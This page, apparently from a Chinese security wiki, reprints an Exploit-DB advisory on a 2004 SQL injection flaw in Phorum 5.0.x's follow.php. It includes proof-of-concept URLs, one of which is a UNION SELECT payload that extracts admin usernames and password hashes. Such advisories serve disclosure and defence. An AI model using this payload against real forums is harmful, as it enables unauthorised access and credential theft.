Phorum 5.0.x – ‘FOLLOW.php’ SQL Injection

Phorum 5.0.x – ‘FOLLOW.php’ SQL Injection

漏洞ID 1054745 漏洞类型
发布时间 2004-11-11 更新时间 2004-11-11
图片[1]-Phorum 5.0.x – ‘FOLLOW.php’ SQL Injection-安全小百科CVE编号 N/A
图片[2]-Phorum 5.0.x – ‘FOLLOW.php’ SQL Injection-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24732
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/11660/info

Reportedly Phorum is affected by a remote SQL injection vulnerability. This issue is due to a failure of the application to properly sanitized user supplied URI input.

This issue allows remote attackers to manipulate query logic, leading to unauthorized access to sensitive information such as the user password hash or corruption of database data. SQL injection attacks may also potentially be used to exploit latent vulnerabilities in the underlying database implementation.

This issue has been reported to affected versions prior to 5.0.13.

http://www.example.com/phorum5012/follow.php?forum_id=1&,f00=bar,1=waraxe
http://www.example.com/phorum5012/follow.php?forum_id=1&thread=waraxe
http://www.example.com/phorum5012/follow.php?forum_id=1&,f00=bar,1=-99%20UNION%20ALL%20SELECT%201%2c1%2c1%2c1%2c1%2cCONCAT(username%2c%27|%27%2cpassword)%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%20FROM%20phorum_users%20WHERE%20admin=1

相关推荐: RealNetwork RealPlayer EMBD3260.DLL Error Response Heap Overflow Vulnerability

RealNetwork RealPlayer EMBD3260.DLL Error Response Heap Overflow Vulnerability 漏洞ID 1098290 漏洞类型 Boundary Condition Error 发布时间 200…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享